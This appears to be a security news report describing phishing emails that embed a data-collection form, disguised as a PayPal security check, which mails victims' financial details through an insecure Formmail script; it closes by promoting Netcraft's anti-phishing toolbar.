New Phishing Attacks Eliminate Need for Target Web Site

New phishing attacks with data collection forms embedded directly in the electronic mails received by victims are inducing victims to send their financial details directly to the phishers via mail rather than through a specially constructed web site mimicking that of the financial institution.


The HTML emails masquerade as a security check on a PayPal account, with the subject "Validate Your Informations by Email" (sic). The message asks recipients to fill in an HTML form, which includes fields for the user's credit card details, date of birth, Social Security number and mother's maiden name. "Completing all of the checklist items will automatically restore your account access," the email advises. Clicking on "Submit to Secure Server" mails the form's contents to a free email account at Yahoo, using a CGI script hosted by a Brazilian hosting reseller at The Planet.

Phishing typically collects data through a web site that imitates a bank or online retailer. By including the data collector in an HTML email, the new attack eliminates a step in the process, allowing phishing scams to steal sensitive information without constructing an elaborate fraudulent web site. The HTML form within the email lets phishers set the destination email address, allowing for easy re-routing of submissions as mailboxes are shut down.

The scam takes advantage of known insecurity in Formmail, a widely-used form-to-mail Perl script initially written in 1995. In early 2001, spammers began using Formmail to anonymously deliver massive volumes of spam, taking advantage of the Formmail's failure to restrict access to the script. Most hosting providers have replaced the original Formmail with customized versions or secure replacement scripts like the NMS Project. The Brazilian hosting reseller involved in this incident, Hospedagem Empresarial (, is an exception.

The Netcraft Anti-Phishing Toolbar is blocking this attack, as the toolbar can block access to insecure scripts being used inphishing attacks. The toolbar can be available for both Internet Explorer and Firefox.